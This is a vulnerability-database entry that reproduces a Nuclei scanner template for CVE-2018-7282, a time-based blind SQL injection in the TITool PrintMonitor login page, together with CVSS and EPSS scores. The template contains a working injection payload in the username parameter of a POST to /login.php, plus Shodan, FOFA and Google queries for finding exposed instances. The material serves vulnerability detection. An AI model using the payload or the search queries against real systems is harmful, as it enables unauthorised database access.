Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-7282
HistoryOct 17, 2023 - 7:20 a.m.

TITool PrintMonitor - Blind SQL Injection

2023-10-1707:20:28
ProjectDiscovery
github.com
9
cve-2018-7282
sql-injection
printmonitor
titool
unauthorized-access

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.5

Confidence

High

EPSS

0.119

Percentile

95.4%

The username parameter of the TITool PrintMonitor solution during the login request is vulnerable to and/or time-based blind SQLi.
id: CVE-2018-7282

info:
  name: TITool PrintMonitor - Blind SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    The username parameter of the TITool PrintMonitor solution during the login request is vulnerable to and/or time-based blind SQLi.
  remediation: Upgrade to PM18.2.1.
  reference:
    - https://fenceposterror.github.io/cve-2018-7282.txt
    - https://nvd.nist.gov/vuln/detail/CVE-2018-7282
    - http://print.com
    - http://ti-tool.com
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-7282
    cwe-id: CWE-89
    epss-score: 0.1391
    epss-percentile: 0.95658
    cpe: cpe:2.3:a:titool:printmonitor:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: titool
    product: printmonitor
    shodan-query:
      - title:"PrintMonitor"
      - http.title:"printmonitor"
    fofa-query: title="printmonitor"
    google-query: intitle:"printmonitor"
    product": printmonitor
  tags: cve2018,cve,sqli,printmonitor,unauth,titool
variables:
  username: "{{rand_base(6)}}"
  password: "{{rand_base(8)}}"

http:
  - raw:
      - |
        @timeout: 20s
        POST /login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}')+OR+4191=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(50000000/2))))--+vDwl&password={{password}}&language=en

    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(body, "PrintMonitor") && contains(header, "text/html")'
        condition: and
# digest: 4a0a00473045022100ec573b18c670d29560ed71dcf93443f68e034fce66f06294bf0b23aeadb462e1022003bfb3d3de007d87998765d3ec871ac5efff191cf95c1a2f148e89d9a66816d5:922c64590222798bb761d5b6d8e72950

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.5

Confidence

High

EPSS

0.119

Percentile

95.4%

Related for NUCLEI:CVE-2018-7282